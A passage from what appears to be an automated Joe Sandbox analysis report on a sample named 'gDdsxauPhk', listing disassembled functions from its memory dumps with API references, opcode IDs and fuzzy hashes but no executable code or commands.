                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0140F0EF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4074154183.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_1400000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: f0184114be461ea936be7a4054e2955b2ef23d131e0e84305c8aeb86a7a9d464
                                                        • Instruction ID: 573937d5d1df01a9d61dbb8079f50d78de10bc17c82c722f3f5ea2a632a2a694
                                                        • Opcode Fuzzy Hash: f0184114be461ea936be7a4054e2955b2ef23d131e0e84305c8aeb86a7a9d464
                                                        • Instruction Fuzzy Hash: 461114B1C002699BCB20CF9AC444BDEFBF4AB48320F15812AE818A7251D778A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0140F088 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0140F0EF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4074154183.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_1400000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 7717100f208fec6c96744e4a493ece143d95fbf432bbe80552685fb6d87bd7bd
                                                        • Instruction ID: 4ee8d57f312ee9816bb971927fed8dec8df98d07b02ed42a97e73c9c7ba11184
                                                        • Opcode Fuzzy Hash: 7717100f208fec6c96744e4a493ece143d95fbf432bbe80552685fb6d87bd7bd
                                                        • Instruction Fuzzy Hash: 4C1123B1C002699BCB10CF9AC444BDEFBF4AF48320F15812AE818B7250D778A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B44B31 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XPcq
                                                        • API String ID: 0-714321711
                                                        • Opcode ID: 2fd4d0f1b6595e300a7cf4e8ae57807910fda0730daabfa748c8a02bfc566a92
                                                        • Instruction ID: 5b4d7afa9acc31843f2ed81dcc88ad8f32d5c773c2beffbef27d5dbf45e58175
                                                        • Opcode Fuzzy Hash: 2fd4d0f1b6595e300a7cf4e8ae57807910fda0730daabfa748c8a02bfc566a92
                                                        • Instruction Fuzzy Hash: 6241BF70B102199FDB55DFA8C854BAEBBF6FF88700F20852AE105AB395DB758C01CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4DA7D Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: d1e7607d14561a4c7796bc23a73b221b0137e7d7a93f6e64461309920c6ccaff
                                                        • Instruction ID: 6f7be7e3286d1a0d40eb31a09df42989cc4f8c535700c4cb276db298944718ba
                                                        • Opcode Fuzzy Hash: d1e7607d14561a4c7796bc23a73b221b0137e7d7a93f6e64461309920c6ccaff
                                                        • Instruction Fuzzy Hash: 2B418FB0E0070A9FDB65EF65D89469EBBB2FF86300F104969E406EB240DB74D846DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B421C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        • Opcode ID: e88853a833fc1874ab4024597c6e1be52c1d2ec432a17bd92dca9a4a844af7df
                                                        • Instruction ID: 9b6bce96204bf2c9c341316950f922ac7ea5a20b4de47f928a2abbcf3c48d8f8
                                                        • Opcode Fuzzy Hash: e88853a833fc1874ab4024597c6e1be52c1d2ec432a17bd92dca9a4a844af7df
                                                        • Instruction Fuzzy Hash: 5D31E170B002058FDB59AB74D41466F7BA2FB89210F108578E406DB394DE39DD45EBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B482A0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q
                                                        • API String ID: 0-388095546
                                                        • Opcode ID: c62a2dd714b322a790c6f23897cd6a3febb5cdcdf5e66102d30877b3cac09c86
                                                        • Instruction ID: 0703699d4dc955f41280a36626e8997fb328e7aeca53f70375f9a350a266aff8
                                                        • Opcode Fuzzy Hash: c62a2dd714b322a790c6f23897cd6a3febb5cdcdf5e66102d30877b3cac09c86
                                                        • Instruction Fuzzy Hash: 89F08CB1B002059FDF78AE59AA807B877A5EB40314F1450B9E905DB240CB39DD06EB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B44270 Relevance: .2, Instructions: 231COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df08479f70662362dd9662a548a1eca37a8204aa9e55a45693a38230cc8c1580
                                                        • Instruction ID: 415b8cf5d300333ce02135ba6ce3247425bc67f30afd1b3f7ab91d9a90a40f4a
                                                        • Opcode Fuzzy Hash: df08479f70662362dd9662a548a1eca37a8204aa9e55a45693a38230cc8c1580
                                                        • Instruction Fuzzy Hash: 41815C70B102099FDF54DFA9D49079EB7F6EB88304F108569E40AEB394EB34EC428B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B461C8 Relevance: .2, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be9de72ed8fe4ff108a24492af1d949d0237e4a25c5d2a3cd38f6a913ecc9732
                                                        • Instruction ID: f7e268ab9b0bb85af0078ac52e127da81b28fd353957dd5f65774a4404cbf0f2
                                                        • Opcode Fuzzy Hash: be9de72ed8fe4ff108a24492af1d949d0237e4a25c5d2a3cd38f6a913ecc9732
                                                        • Instruction Fuzzy Hash: 8F61CFB1F001214FDB54AA7EC88466FAAD7EFC5624B15407AD80EDB360EEA5DD0287C2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B44594 Relevance: .2, Instructions: 224COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab022a10d241b95a68dc64003c706d68f125d76fa5c963080a028f04ee7510b2
                                                        • Instruction ID: ae4b0cb03a80b911c3c592eae46a872e1d39e39aea983d4773f500edf36f5cd9
                                                        • Opcode Fuzzy Hash: ab022a10d241b95a68dc64003c706d68f125d76fa5c963080a028f04ee7510b2
                                                        • Instruction Fuzzy Hash: 79916F70E106198FDF60DF68C880B9DB7B1FF85304F208699D549BB295DB70AA85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B445A8 Relevance: .2, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfd95a919f62940fa6f70ec120df1a3c2d2293a38c3136c343dc7d257f079e10
                                                        • Instruction ID: 8addc0b4d36cb9626388e2adfa757ae8ff543e16bed0ad77501a40345466ae72
                                                        • Opcode Fuzzy Hash: bfd95a919f62940fa6f70ec120df1a3c2d2293a38c3136c343dc7d257f079e10
                                                        • Instruction Fuzzy Hash: 5D913D70E106198BDF60DF68C880B9DB7B1FF89304F208699D549BB255DB70A985CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4EEE0 Relevance: .2, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e9bbdaa2045e0c7880490e918bfd6d07899a33465ef7a9624494766dd042fe8
                                                        • Instruction ID: 724ee0aa1eef01c933ee965643724c9fc5049594f93e9c6169c067fd020d1415
                                                        • Opcode Fuzzy Hash: 7e9bbdaa2045e0c7880490e918bfd6d07899a33465ef7a9624494766dd042fe8
                                                        • Instruction Fuzzy Hash: CD715C70A012199FDB54EFA9D980AADBBF6FF88300F148569E049EB355DB34EC46CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4EEF0 Relevance: .2, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed8dc0ba94a483a41c8f0cd4a04ae641df5f455751534d8416ea796ce1d26b91
                                                        • Instruction ID: f265e7d3a336a7758008a409cb008110f483545e39422217b457d9481954b571
                                                        • Opcode Fuzzy Hash: ed8dc0ba94a483a41c8f0cd4a04ae641df5f455751534d8416ea796ce1d26b91
                                                        • Instruction Fuzzy Hash: 81713C70A012199FDB54EFA9D980AADBBF6FF84300F148569E405EB354DB74EC46CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4FC49 Relevance: .2, Instructions: 178COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: baca06400bb595bd3c889e13b55f64f35b125c306fb632a6fdf071698e82e3f7
                                                        • Instruction ID: c09f47051be8822609705c3707d861a0be95d21852291bcb5af58a871cf8c133
                                                        • Opcode Fuzzy Hash: baca06400bb595bd3c889e13b55f64f35b125c306fb632a6fdf071698e82e3f7
                                                        • Instruction Fuzzy Hash: 4451D1B1E102099FDB24BB78E4846AEBBB6FBC5315F1088B9E10AD7251DB358855CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4F9F7 Relevance: .2, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f716553769de30de6e74fa200538760c1166caf227e90bbb8593e565bf99c4f
                                                        • Instruction ID: d99fe3c56b2763c024c527b57447c2b720184692f7431cac29f85b3f7b03be81
                                                        • Opcode Fuzzy Hash: 1f716553769de30de6e74fa200538760c1166caf227e90bbb8593e565bf99c4f
                                                        • Instruction Fuzzy Hash: 3F51D1B0B102049FEF646ABC999473F2A6ED7C9310F20587AE40AE7395C97DCC459792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4FA08 Relevance: .2, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 44b1a91c2be1d37e1aba20a2bd746451217f200485462a1186685c29cb61ddf3
                                                        • Instruction ID: 2addd89daebb9025512d2c2efb8e5125afb83d1f11a557705686e97d0f2409fa
                                                        • Opcode Fuzzy Hash: 44b1a91c2be1d37e1aba20a2bd746451217f200485462a1186685c29cb61ddf3
                                                        • Instruction Fuzzy Hash: 7F51C3B0B102049FEF646ABCD99473F2A6ED7C9310F20583AE50AE7394C97DCC4557A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B453E8 Relevance: .1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c45f80278e62aafde171e8179dd6617e538a4c6ceca7777bdf21c3cbd784d4f
                                                        • Instruction ID: 45aafa2949f1c0fd8393e28794a592c8bd104dc825d01aa4bc2f7f3f411737c1
                                                        • Opcode Fuzzy Hash: 5c45f80278e62aafde171e8179dd6617e538a4c6ceca7777bdf21c3cbd784d4f
                                                        • Instruction Fuzzy Hash: 6241A2B2E006098FCF70DEA9D880AAFFBB2EB45210F10496AE216D7654C330E855DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4D930 Relevance: .1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 523c71ca4af77be9d4e6e9dd460a0e84f9fa3e67c2f5e54adec21850d9f3183f
                                                        • Instruction ID: a167eb2a0dd64df941fedb1067de8775a7074ac115f33bb01d2b7a1cc75acd86
                                                        • Opcode Fuzzy Hash: 523c71ca4af77be9d4e6e9dd460a0e84f9fa3e67c2f5e54adec21850d9f3183f
                                                        • Instruction Fuzzy Hash: 9131A170A1031A9FCF25DF69C99069EBBB5FF85304F104969E405EB341EBB1E846CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B42078 Relevance: .1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d890e6e4781905cfd405eda7db3651bc7d2834d986f781f0bc720961236da8df
                                                        • Instruction ID: c18d3fdabab7348bd3fa133dd5546f1fa0c22df9e415ada64ab933b9b0b1797a
                                                        • Opcode Fuzzy Hash: d890e6e4781905cfd405eda7db3651bc7d2834d986f781f0bc720961236da8df
                                                        • Instruction Fuzzy Hash: 1731BA70E002169FDB19DFA5D89469EBBF2EF89300F108569F906E7740DB30AD46DB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B42088 Relevance: .1, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 19081adf3f565ee06c41d9f14a93bce3726e539d629959dd011f5f8a61fb73c8
                                                        • Instruction ID: 7b8271e58df353ae791b369f807572019cbc01cabe55daa632a5ba5334940523
                                                        • Opcode Fuzzy Hash: 19081adf3f565ee06c41d9f14a93bce3726e539d629959dd011f5f8a61fb73c8
                                                        • Instruction Fuzzy Hash: 2B319A70E0021A9BDB58DFA5D89469EB7F2FF89300F108529F906E7740DB71AD42DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B43E78 Relevance: .1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8155ab0af055de84e2e96c6892b3b9e7118c1136d18fc94f5e58658e90a6029
                                                        • Instruction ID: 74ddd2f2d4bcf819cb21e9ec5bd82c8748ffc3fa01d9e6986527d0f2743120be
                                                        • Opcode Fuzzy Hash: a8155ab0af055de84e2e96c6892b3b9e7118c1136d18fc94f5e58658e90a6029
                                                        • Instruction Fuzzy Hash: CA219CB1F112559FDB00DF69D880AAEBBF5FB88610F148069E905E7380E739DD018B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B43E88 Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e6eebb85513ba0b8a1009524d7e90f29f9886c211172977041f20af156ba488
                                                        • Instruction ID: ba4bbdf2a9613c1a6fe516fe960bc4f576b9647d95eb93d57e1ac2c31db14269
                                                        • Opcode Fuzzy Hash: 3e6eebb85513ba0b8a1009524d7e90f29f9886c211172977041f20af156ba488
                                                        • Instruction Fuzzy Hash: 86217CB5F112159FDB40DF6AD880AAEBBF5FB88710F148069E905E7390E739DD018B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0126D044 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4072563153.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_126d000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae243ef908f44edc6ad20798faad5f02068d6b1df0329d124f5f7feec5f7d57d
                                                        • Instruction ID: e7128020b83c98849496884af2f09bee0825a91d957039c42b041740f5da2784
                                                        • Opcode Fuzzy Hash: ae243ef908f44edc6ad20798faad5f02068d6b1df0329d124f5f7feec5f7d57d
                                                        • Instruction Fuzzy Hash: C821377161420CDFCB11DF68C9C4B26BB69FB84314F20C5ADE9894B292C777D486CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0126D20C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4072563153.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_126d000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f73a681b8e17795ff9faafccd52d6db6c5695f47d50abbd445e7453f29ab7c8
                                                        • Instruction ID: 3eb44bbfd7469ca8b9a48220985f3088d495d7ab86c5fff536b52a8eedb0ee7b
                                                        • Opcode Fuzzy Hash: 1f73a681b8e17795ff9faafccd52d6db6c5695f47d50abbd445e7453f29ab7c8
                                                        • Instruction Fuzzy Hash: 6421687172424CDFDB01DF58D5C4B2ABB69FB84334F20C669D9890B283C376D486CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0126D3BC Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4072563153.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_126d000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 54d25df95b14e1b4d7320d4f77508580be35e7ad95e792c1aefa2d5a9ebaa0f7
                                                        • Instruction ID: 50d95b00ebc3cb55e4b3b93fcc95215cdf715a94a2f0a459042d6a1b1986f6a7
                                                        • Opcode Fuzzy Hash: 54d25df95b14e1b4d7320d4f77508580be35e7ad95e792c1aefa2d5a9ebaa0f7
                                                        • Instruction Fuzzy Hash: 2A21347161024CDFCB01DF58D5C0B26BBA9FB84314F20C56DE9894B2D6C376E886CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B43428 Relevance: .1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd19272a2b789bb325d6ea100cc20deb2721fac90fd6a633ac3f7e8d9f255fb4
                                                        • Instruction ID: 398fd68725cbc4bda801b1f85ddc5eeb1e7bb3ec6848941c2399f227a84efde7
                                                        • Opcode Fuzzy Hash: dd19272a2b789bb325d6ea100cc20deb2721fac90fd6a633ac3f7e8d9f255fb4
                                                        • Instruction Fuzzy Hash: BE2193B1E002289FCB65EB7AD8405DEFBE5EB89310F1485A9E10AE7241DA32D945CFD1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B441D1 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03c69a3655f615496980ae4689f71d27c1dbe2a59bb2d165c501a8ca726e0df9
                                                        • Instruction ID: 8f4502efaf817948402d327b0d1d35cfe39e345644e897342aa9a138d81be674
                                                        • Opcode Fuzzy Hash: 03c69a3655f615496980ae4689f71d27c1dbe2a59bb2d165c501a8ca726e0df9
                                                        • Instruction Fuzzy Hash: 3201F534B202211FD761E67EA850B6BBBDECBC9610F14847AF50EC7381DE24CC1243A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B43F98 Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 507a11f8331f61ecb88ca89103ac9435ca85e9cfc3db336d8b2e89223b790380
                                                        • Instruction ID: 34f275b9d13683ba9046bae181d9e871f035a562e63c1148f325769600ac9ed8
                                                        • Opcode Fuzzy Hash: 507a11f8331f61ecb88ca89103ac9435ca85e9cfc3db336d8b2e89223b790380
                                                        • Instruction Fuzzy Hash: 1D11AD32B041295FDF58AA68CC14AAF73FAEBC8211B04457AD50AE7340DE69DC129BD2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B43C52 Relevance: .1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 516d582b12293876f35ed477edadbf6e1d779d13eba8bd583b8dc7ec6b26a776
                                                        • Instruction ID: 16d6ea68687b333688e6a9f24a9693455aa9d3909650e5be27ff6cea35decfe6
                                                        • Opcode Fuzzy Hash: 516d582b12293876f35ed477edadbf6e1d779d13eba8bd583b8dc7ec6b26a776
                                                        • Instruction Fuzzy Hash: 9521C7B5D01269AFCB10DF9AD885ACEFFB8FB48314F10812AE918A7241C3756554CFE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4A2D2 Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6f526348272064b52a9e057e067756b0e94e773374ad8376d611b643266796c6
                                                        • Instruction ID: 7ca2768807cb3382561e40a5e11f3f5f63885a5a6aa0f5147ff3ef4817ea3309
                                                        • Opcode Fuzzy Hash: 6f526348272064b52a9e057e067756b0e94e773374ad8376d611b643266796c6
                                                        • Instruction Fuzzy Hash: 0201F170B142101FDB71E62DA850B6B7BEAEB8A604F108479F00ACB345EE25DC029791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B4F161 Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 341508a56ce15a01c7f2777902ff4dec843570abac1607631c4e6403b4de3e08
